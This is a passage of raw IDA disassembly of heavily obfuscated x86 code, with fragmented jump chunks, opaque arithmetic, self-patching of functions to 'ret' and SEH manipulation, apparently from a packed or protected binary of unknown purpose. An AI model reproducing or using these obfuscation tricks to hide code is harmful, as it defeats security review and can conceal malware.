		pushf
		push	0CA6AC6A6h
		jmp	loc_4525B4
sub_447659	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_447668:				; CODE XREF: sub_43B8D6:loc_43B8E4j
		jz	loc_4425D7
		jmp	loc_43DFF7
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_447673:				; CODE XREF: sub_43E389+1296Ej
		jl	loc_43ECD4
		jle	loc_443244
		mov	ebx, [esi]
		jmp	loc_43ECD1
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
		not	edi
		jmp	loc_445EEC
; ---------------------------------------------------------------------------

loc_44768D:				; CODE XREF: y2kk37jd:00444FF2j
		jp	loc_45B243

loc_447693:				; CODE XREF: y2kk37jd:loc_457953j
		add	eax, 0F7781A55h
		add	eax, ebp
		add	eax, 1CC8E5E8h
		mov	eax, [eax]
		mov	al, [eax]
		jb	loc_4556B5
		jmp	loc_4481A3
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4476B1:				; CODE XREF: sub_445226+726Fj
		jmp	sub_45C4C8
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_4476B6:				; CODE XREF: sub_44B489-A2F4j
		jmp	nullsub_183
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
		db 92h
		align 10h

loc_4476C0:				; DATA XREF: sub_454B16-1211Co
					; y2kk37jd:00450B78o
		aad	0D4h
		xor	dl, bh
		cdq
		and	edx, [edi]
		enter	0FFFFB136h, 0
; START	OF FUNCTION CHUNK FOR sub_44EB56

loc_4476CB:				; CODE XREF: sub_44EB56+20j
		jmp	loc_43D0D7
; END OF FUNCTION CHUNK	FOR sub_44EB56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4476D0:				; CODE XREF: sub_445226-312Ej
		jmp	loc_43F599
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jnz	loc_43DCC2
		mov	edx, ds:dword_457EBC
		or	edx, edx
		jnz	loc_452D01
		jmp	loc_44EFC0

; =============== S U B	R O U T	I N E =======================================



sub_4476EE	proc near		; CODE XREF: sub_44001E-4A25p
					; y2kk37jd:loc_440D69p	...

; FUNCTION CHUNK AT 0045C394 SIZE 00000005 BYTES

		jo	sub_44E4A5
		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4470E0, 0
		push	offset loc_44017B
		jmp	loc_45C394
sub_4476EE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508FD

loc_447709:				; CODE XREF: y2kk37jd:loc_446966j
					; sub_4508FD+270Cj
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45854F
; END OF FUNCTION CHUNK	FOR sub_4508FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449775

loc_447711:				; CODE XREF: sub_449775+3A3Bj
		sub	ebx, 0FFB75779h
		xor	ebx, 216C926Fh
		push	offset loc_44CFF0
		jmp	loc_459398
; END OF FUNCTION CHUNK	FOR sub_449775
; ---------------------------------------------------------------------------

loc_447727:				; CODE XREF: y2kk37jd:0043DCDDj
		add	edx, 32687436h
		call	sub_447F67
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_447732:				; CODE XREF: sub_4448E2+7C79j
		jmp	loc_45C49A
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_447737:				; CODE XREF: sub_44DC38-AFFFj
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------

loc_44773C:				; CODE XREF: y2kk37jd:loc_442ECCj
		jz	loc_44D915
		jmp	loc_4465AD
; ---------------------------------------------------------------------------
		add	edi, 53AB445Ah
		jmp	loc_44CC01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_447752:				; CODE XREF: sub_44113A:loc_44306Ej
		jz	loc_449FE0
		jmp	loc_445965
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C01B

loc_44775D:				; CODE XREF: sub_44C01B+DFCFj
		mov	ebp, ebx
		pop	ebx
		xor	eax, eax
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_4464AE
; END OF FUNCTION CHUNK	FOR sub_44C01B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480D8

loc_44776D:				; CODE XREF: sub_4480D8+1Dj
		add	ebx, 3F104077h
		mov	[ebx], eax
		pop	ebx
		lea	eax, nullsub_461
		mov	byte ptr [eax],	0C3h
		jmp	loc_45C23A
; END OF FUNCTION CHUNK	FOR sub_4480D8
; ---------------------------------------------------------------------------

loc_447784:				; CODE XREF: y2kk37jd:0043F881j
		mov	eax, [esp]
		push	edx
		call	sub_43C18D

loc_44778D:				; CODE XREF: y2kk37jd:loc_446654j
		push	offset loc_443AD1
		jmp	locret_43DC2A

; =============== S U B	R O U T	I N E =======================================



sub_447797	proc near		; CODE XREF: sub_41AAC1+20p
					; sub_41C7BA+26Ep ...
		call	sub_4477A2

loc_44779C:				; CODE XREF: sub_454539-9E99j
		jmp	ds:off_41E0CC
sub_447797	endp


; =============== S U B	R O U T	I N E =======================================



sub_4477A2	proc near		; CODE XREF: sub_447797p
					; sub_450D4C+10j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D1E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004405E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443211 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00447BB3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448E63 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004492BE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00449527 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F3CA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004549BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455494 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045771F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00457E25 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459EA5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A0AD SIZE 0000000B BYTES

		pop	edx
		jz	loc_45771F
		mov	eax, [esp-4+arg_0]

loc_4477AC:				; CODE XREF: y2kk37jd:0045AC70j
		push	edx
		call	sub_44F3F5
		push	1EC5D7B2h
		jmp	loc_4405E4
sub_4477A2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	ebp, ecx
		xchg	edx, esi
		jmp	sub_43F97C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_4477C5:				; CODE XREF: sub_43E0DE:loc_44E038j
		pop	ebx
		mov	eax, [eax]
		popf
		mov	al, [eax]
		jnz	loc_45B6CD
		sub	al, 99h
		call	sub_4501A6
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_4477D8:				; CODE XREF: sub_4450D1:loc_457AE3j
		jmp	loc_4515C3
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
		xor	esi, edi
		jmp	sub_444000
; ---------------------------------------------------------------------------

loc_4477E4:				; DATA XREF: sub_43C1D5:loc_450A7Do
		push	eax
		call	sub_45C2E1
		call	sub_4484F7
; START	OF FUNCTION CHUNK FOR sub_448797

loc_4477EF:				; CODE XREF: sub_448797+13666j
		jmp	loc_44F67D
; END OF FUNCTION CHUNK	FOR sub_448797
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_4477F4:				; CODE XREF: sub_451634+6C7j
		jmp	sub_4476EE
; END OF FUNCTION CHUNK	FOR sub_451634

; =============== S U B	R O U T	I N E =======================================



sub_4477F9	proc near		; CODE XREF: sub_445185+9j sub_446C9Bp ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00445193 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AEFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C04E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045112D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A4FD SIZE 00000005 BYTES

		pop	edx
		jo	loc_445193
		mov	eax, [esp+0]
		push	edx

loc_447804:				; CODE XREF: sub_44B55D:loc_43F5ABj
		push	edx
		push	0C80D5995h
		jmp	loc_44AEFC
sub_4477F9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44780F:				; CODE XREF: y2kk37jd:00442357j
		jno	loc_458142
		jmp	loc_448E1A
; ---------------------------------------------------------------------------
		pop	eax
		sub	ecx, ebx
		jmp	sub_440F0C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447823:				; CODE XREF: y2kk37jd:00459E4Aj
		jmp	sub_4430DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_447828:				; CODE XREF: sub_4447EA+DA0Cj
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44782D:				; CODE XREF: sub_4411C3+11ECj
		jmp	loc_452F5A
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_447832	proc near		; CODE XREF: sub_447423-1928p
					; sub_44F930:loc_4466B1j ...

; FUNCTION CHUNK AT 0043B369 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453FF6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454FCB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BA80 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045BD22 SIZE 0000000A BYTES

		jnz	loc_45BD22
		push	ebp
		mov	ebp, esp
		call	sub_454DAD

loc_447840:				; CODE XREF: sub_444338+13j
		jmp	loc_453FF6
sub_447832	endp

; ---------------------------------------------------------------------------

loc_447845:				; CODE XREF: y2kk37jd:0043C6C6j
		jmp	loc_4449FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44784A:				; CODE XREF: sub_43C851-179Dj
		jmp	loc_45138E
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_44784F:				; CODE XREF: y2kk37jd:0044270Cj
		cmp	ebx, edi
		jmp	loc_456067
; ---------------------------------------------------------------------------

loc_447856:				; CODE XREF: y2kk37jd:0044E916j
		pop	edi
		lea	eax, sub_448DCA
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AD44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_447865:				; CODE XREF: sub_448DCAj
		pop	edx
		mov	eax, [esp-0Ch+arg_8]
		jmp	loc_443F1D
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44786E:				; CODE XREF: sub_4448E2+EA8Bj
		rol	ecx, 1Ch
		xor	ecx, ds:4000EEh
		rol	ecx, 6
		and	ecx, 0BEC6E8D8h
		xor	ecx, 0C6BED139h
		add	eax, ecx
		xchg	ebp, [esp+8+var_8]
		mov	ecx, ebp

loc_44788D:				; CODE XREF: sub_44F641+6BC4j
		jmp	loc_445E87
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_447892:				; CODE XREF: y2kk37jd:0044B1BBj
		jns	loc_43FFB7
		and	ecx, edi
		jnb	loc_43E382
		jnp	loc_43FEEA
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_4478A6:				; CODE XREF: sub_454C24:loc_44B1A5j
		add	edi, 883F56FBh
		add	ebx, edi
		call	sub_457A46

loc_4478B3:				; CODE XREF: y2kk37jd:004506F2j
		jmp	loc_45B59C
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45120B

loc_4478B8:				; CODE XREF: sub_45120B:loc_4577A4j
		xchg	edi, [esp+0]
		jmp	loc_440616
; END OF FUNCTION CHUNK	FOR sub_45120B
; ---------------------------------------------------------------------------

loc_4478C0:				; CODE XREF: y2kk37jd:0043BA5Bj
		jnz	loc_44643B
; START	OF FUNCTION CHUNK FOR sub_455C55

loc_4478C6:				; CODE XREF: sub_455C55+1Fj
					; sub_44F641:loc_4561FFj
		jmp	loc_456BBF
; END OF FUNCTION CHUNK	FOR sub_455C55
; ---------------------------------------------------------------------------
		jnb	loc_451CC1
		test	esi, ebx
		jmp	loc_44642F
; ---------------------------------------------------------------------------

loc_4478D8:				; DATA XREF: y2kk37jd:004441DCo
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		mov	eax, [esp]
		push	ecx
		jmp	loc_459F5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4478E7:				; CODE XREF: sub_445226+8753j
		mov	esi, 0E50C50E8h
		and	eax, 3B06FAFDh

loc_4478F2:				; CODE XREF: y2kk37jd:loc_44835Ej
		cmp	dword ptr [ebp-1C8h], 2B584245h
		jnz	loc_446334
		jmp	loc_455C3E
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_459. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_447908:				; CODE XREF: sub_43D41D+18833j
		jmp	nullsub_426
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DB2

loc_44790D:				; CODE XREF: sub_447DB2+8j
		jmp	nullsub_104
; END OF FUNCTION CHUNK	FOR sub_447DB2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_447913:				; CODE XREF: sub_44F086+2CD4j
		jmp	sub_45ADEC
; END OF FUNCTION CHUNK	FOR sub_44F086

; =============== S U B	R O U T	I N E =======================================



sub_447918	proc near		; CODE XREF: sub_4458DD:loc_43F743p
					; sub_442002+9p

; FUNCTION CHUNK AT 00455989 SIZE 00000005 BYTES

		push	offset loc_448840
		jmp	loc_455989
sub_447918	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_447922:				; CODE XREF: sub_453867-A1C0j
		mov	[ebx], esi
		test	ecx, 0C890CA96h
		jmp	loc_453C7C
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44792F:				; CODE XREF: sub_442DDC:loc_453D65j
		add	edx, 9F5C31B8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43E351
		jmp	loc_446AD0
; END OF FUNCTION CHUNK	FOR sub_442DDC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_441. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_447947:				; CODE XREF: sub_4438B1+130BCj
		jmp	loc_442664
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44794C:				; CODE XREF: sub_4458DD+F5A5j
		jmp	loc_4495CE
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		add	ebx, ecx
		jmp	sub_4532F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_447958:				; CODE XREF: sub_43C335:loc_43EBB3j
		adc	ebx, 0A99F7153h
		and	ecx, edi
		jmp	loc_442339
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_447965:				; CODE XREF: sub_4448E2:loc_443EE5j
		jz	loc_4552E3
		jmp	loc_43EBF9
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_447970:				; CODE XREF: sub_44A6B5+3957j
		mov	ds:dword_446624, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44A6B5

; =============== S U B	R O U T	I N E =======================================



sub_447977	proc near		; CODE XREF: sub_44AFF6:loc_43C939p
					; sub_43F023+Dj ...

; FUNCTION CHUNK AT 0043CC4C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446678 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446DCB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004507E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004523AD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004536E2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004542A8 SIZE 00000002 BYTES

		js	loc_446DCB
		call	sub_43C054

loc_447982:				; CODE XREF: sub_44EAF8j
					; DATA XREF: sub_4480CB:loc_44EAEEo
		add	ecx, 317380Fh
		call	sub_4415FF
		push	edi
		jmp	loc_446678
sub_447977	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ecx, 0F28A9E54h
		jmp	loc_44AA90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_44799E:				; CODE XREF: sub_440040-2D84j
		rol	esi, 10h
		xor	esi, 0CB54EACh
		cmp	esi, 37EF3FFAh
		jmp	loc_457D42
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------

loc_4479B2:				; CODE XREF: y2kk37jd:00441A53j
		xor	ebx, ecx
		push	ebx
		sub	ebx, 21729075h

loc_4479BB:				; CODE XREF: y2kk37jd:loc_43E5C5j
		push	edx
		push	33D9AA5Dh
		pop	edx
		or	edx, ds:4000EAh
		and	edx, 3B95499Dh
		jmp	loc_4494E8
; ---------------------------------------------------------------------------

loc_4479D3:				; DATA XREF: sub_444D6F:loc_4449B1o
		add	ebx, 9E0CAFAh
		call	sub_43B1E6
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_4479DE:				; CODE XREF: sub_44AD49:loc_451E40j
					; sub_450394:loc_454AB3j
		xchg	ebx, [esp+4+var_4]
		push	0AFFFF7C5h
		push	ebx
		push	43E37B18h
		pop	ebx
		rol	ebx, 4
		xor	ebx, 0C832DC6Fh

loc_4479F6:				; CODE XREF: sub_449C4F-6FA0j
		jmp	loc_44D7EA
; END OF FUNCTION CHUNK	FOR sub_44AD49

; =============== S U B	R O U T	I N E =======================================



sub_4479FB	proc near		; DATA XREF: sub_4484F7-96F2o

; FUNCTION CHUNK AT 004516CC SIZE 00000005 BYTES

		mov	eax, [ebp-4]
		jno	sub_4432FD
		add	eax, 28h
		mov	[ebp-4], eax
		inc	dword ptr [ebp-0Ch]
		push	offset sub_44F2FB

loc_447A12:				; CODE XREF: y2kk37jd:loc_45C4F4j
		jmp	loc_4516CC
sub_4479FB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_447A17:				; CODE XREF: sub_455B08:loc_45AC1Cj
		add	ebp, edi
		jle	loc_4460AA
		shl	ebx, 6
		jmp	loc_444115
; END OF FUNCTION CHUNK	FOR sub_455B08
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_447A28:				; CODE XREF: sub_44001E+Cj
		push	eax

loc_447A29:				; CODE XREF: y2kk37jd:0044AB74j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+10h+var_10]
		push	0F9816C48h
		pop	ecx
		sub	ecx, 8A76D228h
		cmp	ecx, 74E99E16h
		jmp	loc_447AE4
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_447A46:				; CODE XREF: sub_4514DE+519Bj
		jb	loc_44F9AC
		add	edi, edx
		jmp	sub_446EC6
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------

loc_447A53:				; CODE XREF: y2kk37jd:loc_4421D0j
		xor	ebx, edi
		jmp	sub_444D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_447A5A:				; CODE XREF: sub_43ED86+CBE3j
		jnp	loc_4488A7

loc_447A60:				; CODE XREF: sub_449C4F:loc_440A93j
		ror	ebp, 0Ch
		jp	sub_4589B7

loc_447A69:				; CODE XREF: sub_43ED86:loc_43BA39j
		push	3D173495h
		pop	eax
		jmp	loc_451B60
; END OF FUNCTION CHUNK	FOR sub_43ED86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_339. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447A75:				; CODE XREF: y2kk37jd:loc_45A4E5j
		sub	esi, 3ED30A0Eh
		rol	esi, 7
		or	esi, 91B60BE9h
		jnz	loc_451255

loc_447A8A:				; CODE XREF: y2kk37jd:00442C9Cj
		jmp	sub_44884D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCE7

loc_447A8F:				; CODE XREF: sub_44CCE7-BFA2j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44CCE7
; ---------------------------------------------------------------------------

loc_447A94:				; CODE XREF: y2kk37jd:0043CE1Fj
		jmp	loc_44F790
; ---------------------------------------------------------------------------
		rol	esi, 0Fh
		jmp	loc_451250
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44310A

loc_447AA1:				; CODE XREF: sub_44310A:loc_4580AFj
		push	offset loc_44A989

loc_447AA6:				; CODE XREF: y2kk37jd:00446998j
		jmp	nullsub_525
; END OF FUNCTION CHUNK	FOR sub_44310A
; ---------------------------------------------------------------------------

loc_447AAB:				; DATA XREF: sub_44AC89:loc_442D25o
		add	eax, 0B0C50F7Fh
		mov	eax, [eax]
		mov	al, [eax]

loc_447AB5:				; CODE XREF: y2kk37jd:loc_456067j
		mov	edx, [ebp-28h]
		call	sub_43BF5F
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_447ABD:				; CODE XREF: sub_44AC89:loc_43CAC8j
					; sub_44AC89-43E4j
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 52h
		push	edx
		push	0F2B15E1Ch
		pop	edx
		add	edx, 3DE72E72h
		cmp	edx, 0E624E930h
		jmp	loc_457C48
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_447AE4:				; CODE XREF: sub_44001E+7A23j
		jl	loc_45C0AB

loc_447AEA:				; CODE XREF: sub_456FC0+Fj
		jmp	loc_43CC33
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_447AEF:				; CODE XREF: sub_43C851+15413j
		jmp	sub_453854
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_447AF4:				; CODE XREF: sub_446718+A8AEj
		jmp	loc_452C35
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
		mov	ebx, [ecx]
		and	esi, 9F6EBE7Dh
		jz	loc_44D5D2
		jmp	loc_45C0A5
; ---------------------------------------------------------------------------

loc_447B0C:				; CODE XREF: y2kk37jd:0045A15Ej
		rol	ebp, 1Fh
; START	OF FUNCTION CHUNK FOR sub_4473CD

loc_447B0F:				; CODE XREF: sub_4473CD:loc_45A152j
		rol	edi, 1
		add	edi, 0A8AC90Dh
		xchg	edi, [esp+4+var_4]
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_4473CD
; ---------------------------------------------------------------------------

loc_447B1F:				; CODE XREF: y2kk37jd:0043D127j
		pop	ebx
		or	ebx, 0A5F6FDB6h
		xor	ebx, 1391F907h
		add	ebx, ebp
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_447B2E:				; CODE XREF: sub_43C851:loc_453AE0j
		add	ebx, 1190F94Bh
		call	sub_4571A7

loc_447B39:				; CODE XREF: sub_44704D+8029j
		jmp	loc_450AFC
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_447B3E:				; CODE XREF: y2kk37jd:00448DEBj
		jmp	nullsub_15
; ---------------------------------------------------------------------------

loc_447B43:				; DATA XREF: y2kk37jd:00457A36o
		push	ecx
		push	363B94D7h
		pop	ecx
		or	ecx, 6ED7948Ch
		add	ecx, 81424B69h
		jmp	loc_43FAC2
; ---------------------------------------------------------------------------

loc_447B5B:				; CODE XREF: y2kk37jd:0044248Fj
		pop	ebx
		add	ebx, 0A884F75h
		and	ebx, 62873C99h
		or	ebx, 4D85E883h
		add	ebx, 92BE1D71h
		jmp	loc_43FA1B

; =============== S U B	R O U T	I N E =======================================



sub_447B79	proc near		; DATA XREF: sub_455DD8-181C9o
		add	esp, 0FFFFFFE4h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		push	offset loc_448621
		jmp	nullsub_50
sub_447B79	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A53

loc_447B8C:				; CODE XREF: sub_455A53:loc_441829j
		add	eax, 8046E6ECh
		xchg	eax, [esp+0]
		jmp	loc_45B9AB
; END OF FUNCTION CHUNK	FOR sub_455A53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_447B9A:				; CODE XREF: sub_447F91:loc_45AD3Cj
					; sub_447F91+14286j
		push	ecx
		push	0ED35EE69h
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		rol	ecx, 12h
		jmp	loc_440C22
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------

loc_447BAE:				; CODE XREF: y2kk37jd:00459EBEj
		mov	esi, 48D40988h
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_447BB3:				; CODE XREF: sub_4477A2+12709j
		rol	edi, 1
		add	edi, 0EBD9CB51h
		xchg	edi, [esp+4+var_4]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4477A2

; =============== S U B	R O U T	I N E =======================================



sub_447BC3	proc near		; CODE XREF: sub_419A20+19p
					; y2kk37jd:00457B21j
					; DATA XREF: ...
		push	offset loc_44919A
		jmp	nullsub_51
sub_447BC3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_447BCD:				; CODE XREF: sub_4507BF-13E4Bj
					; sub_4507BF-9535j ...
		jb	loc_44A1D4

loc_447BD3:				; CODE XREF: y2kk37jd:loc_451DFFj
		cmp	dword ptr [ebp-10Ch], 36343831h
		jnz	loc_441A41
		jmp	loc_43E844
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		push	ebx
		jmp	sub_43C054
; ---------------------------------------------------------------------------

loc_447BEE:				; CODE XREF: y2kk37jd:004410BEj
		mov	ebp, esi
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_447BF0:				; CODE XREF: y2kk37jd:loc_43F6B5j
					; y2kk37jd:00448187j ...
		mov	esp, ebp
		xchg	edx, [esp+0]
		mov	ebp, edx
		jmp	loc_4512CB
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_447BFC:				; CODE XREF: sub_446E19:loc_441A0Dj
		mov	[esi], eax
		pop	esi
		cmp	dword ptr [ebp-4], 0
		jz	loc_43CC4C
		jmp	loc_453459
; END OF FUNCTION CHUNK	FOR sub_446E19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448512

loc_447C0F:				; CODE XREF: sub_448512+Fj
		jmp	loc_45AB60
; END OF FUNCTION CHUNK	FOR sub_448512
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BB55

loc_447C14:				; CODE XREF: sub_43BB55:loc_459F47j
		push	ecx
		mov	ecx, ebp
		push	offset sub_44D0F1
		jmp	loc_451A63
; END OF FUNCTION CHUNK	FOR sub_43BB55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_447C21:				; CODE XREF: sub_454251-5268j
		jnp	loc_450A8D

loc_447C27:				; CODE XREF: sub_454251-E40Cj
		sub	eax, 0D0462D13h
		xor	eax, 0EF9D55DFh
		push	esi
		pushf
		push	23126E3Ah
		pop	esi
		jmp	loc_453191
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_447C40:				; CODE XREF: sub_453867-9A6Ej
